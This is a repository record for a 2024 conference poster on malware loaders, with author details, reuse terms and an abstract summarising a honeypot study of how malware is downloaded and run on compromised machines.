Poster: The State of Malware Loaders

Conference paper (2024)

Authors

Cristian Munteanu Max Planck Institut für Informatik

G. Smaragdakis , Max Planck Institut für Informatik

Anja Feldmann Max Planck Institut für Informatik

To reference this document use:

http://resolver.tudelft.nl/uuid:5570eeb2-f6b5-486f-be99-8872af2025c2

More Info

expand_more

Published Date

2024

Language

English

Reuse Rights

Other than for strictly personal use, it is not permitted to download, forward or distribute the text or part of it, without the consent of the author(s) and/or copyright holder(s), unless the work is under an open content license such as Creative Commons.

Abstract

Malware is recognized as one of the most severe cybersecurity threats today. Although malware attacks are as old as the Internet, our understanding of which part of the Internet infrastructure is used to distribute malware software is still rather limited.
In this work, we analyze more than 3 million sessions established with honeypots deployed in 55 countries that are associated with the download and execution of malware binaries. We identify two main tactics to load malware to infected machines: injection of malware by hosts initiating the connection (clients) and downloading malware from third parties (loaders). The latter tactic contributes to more than 80% of this class of sessions but involves a smaller number of cloud and content delivery servers with very different profiles than that of the clients. Our analysis also shows that it is not uncommon for different malware families to rely on the same hosting infrastructures for downloading malware. Further investigation into the code executed to download and activate malware shows that criminals tend to hide their traces by deleting their history and modifying logs and files on the compromised machines.

Files

3646547.3689659.pdf

(pdf | 1.44 Mb)

Unknown license